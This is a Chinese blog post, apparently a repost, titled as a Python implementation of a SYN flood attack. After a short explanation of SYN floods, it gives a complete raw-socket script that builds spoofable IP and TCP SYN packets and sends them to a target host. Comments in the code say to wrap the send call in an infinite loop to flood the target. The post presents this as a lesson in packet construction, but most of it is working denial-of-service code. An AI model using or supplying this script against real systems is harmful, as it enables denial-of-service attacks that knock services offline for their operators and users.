Python实现SYN Flood攻击

zoukankan html css js c++ java

Python实现SYN Flood攻击

0×00 背景

SYN Flood是当前最流行的DoS（拒绝服务攻击）与DDoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式。

0×01 Code

本文章的目是介绍使用python构造packet的方法。
使用raw socket来发送packets。该程序只适用于Linux。windows可以尝试调用winpcap。

'''

    Syn flood program in python using raw sockets (Linux)



    Silver Moon (m00n.silv3r@gmail.com)

'''

# some imports

import socket, sys

from struct import *

# checksum functions needed for calculation checksum

def checksum(msg):

    s = 0

    # loop taking 2 characters at a time

    for i in range(0, len(msg), 2):

        w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )

        s = s + w



    s = (s>>16) + (s & 0xffff);

    #s = s + (s >> 16);

    #complement and mask to 4 byte short

    s = ~s & 0xffff



    return s

#create a raw socket

try:

    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)

except socket.error , msg:

    print 'Socket could not be created. Error Code : ' + str(msg[0]) +' Message ' + msg[1]

    sys.exit()

# tell kernel not to put in headers, since we are providing it

s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)



# now start constructing the packet

packet = '';

source_ip = '192.168.1.101'

dest_ip = '192.168.1.1' # or socket.gethostbyname('www.google.com')

# ip header fields

ihl = 5

version = 4

tos = 0

tot_len = 20 + 20  # python seems to correctly fill the total length, dont know how ??

id = 54321  #Id of this packet

frag_off = 0

ttl = 255

protocol = socket.IPPROTO_TCP

check = 10  # python seems to correctly fill the checksum

saddr =socket.inet_aton ( source_ip )  #Spoof the source ip address if you want to

daddr = socket.inet_aton ( dest_ip )

ihl_version = (version << 4) + ihl

# the ! in the pack format string means network order

ip_header = pack('!BBHHHBBH4s4s', ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)

# tcp header fields

source = 1234   # source port

dest = 80   # destination port

seq = 0

ack_seq = 0

doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes

#tcp flags

fin = 0

syn = 1

rst = 0

psh = 0

ack = 0

urg = 0

window = socket.htons (5840)    #   maximum allowed window size

check = 0

urg_ptr = 0

offset_res = (doff << 4) + 0

tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) +(ack << 4) + (urg << 5)

# the ! in the pack format string means network order

tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)

# pseudo header fields

source_address = socket.inet_aton( source_ip )

dest_address = socket.inet_aton(dest_ip)

placeholder = 0

protocol = socket.IPPROTO_TCP

tcp_length = len(tcp_header)

psh = pack('!4s4sBBH', source_address , dest_address , placeholder , protocol , tcp_length);

psh = psh + tcp_header;

tcp_checksum = checksum(psh)

# make the tcp header again and fill the correct checksum

tcp_header = pack('!HHLLBBHHH', source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)

# final full packet - syn packets dont have any data

packet = ip_header + tcp_header

#Send the packet finally - the port specified has no effect

s.sendto(packet, (dest_ip , 0))    # put this in a loop if you want to flood the target

#put the above line in a loop like while 1: if you want to flood

注意：运行时需要Root权限。

查看全文

相关阅读:
一个简单的链表结构分类： C/C++ 数据结构与算法 2015-06-14 16:39 129人阅读评论(1) 收藏
 整数与浮点数的二进制表示方式分类： C/C++ 2015-06-13 15:45 54人阅读评论(0) 收藏
 对string的一些扩展函数分类： C/C++ 2015-06-12 15:43 170人阅读评论(1) 收藏
 SQL常用操作 2015-06-12 12:43 20人阅读评论(0) 收藏
 Google C++编程风格 2015-06-11 11:25 36人阅读评论(0) 收藏
 C++头文件编译问题分类： C/C++ 2015-06-10 15:48 32人阅读评论(0) 收藏
 服务器TIME_WAIT和CLOSE_WAIT详解和解决办法
 解决time_wait过多的问题
 Gdb调试多进程程序
 linux查看硬件配置命令

原文地址：https://www.cnblogs.com/ye1031/p/4509481.html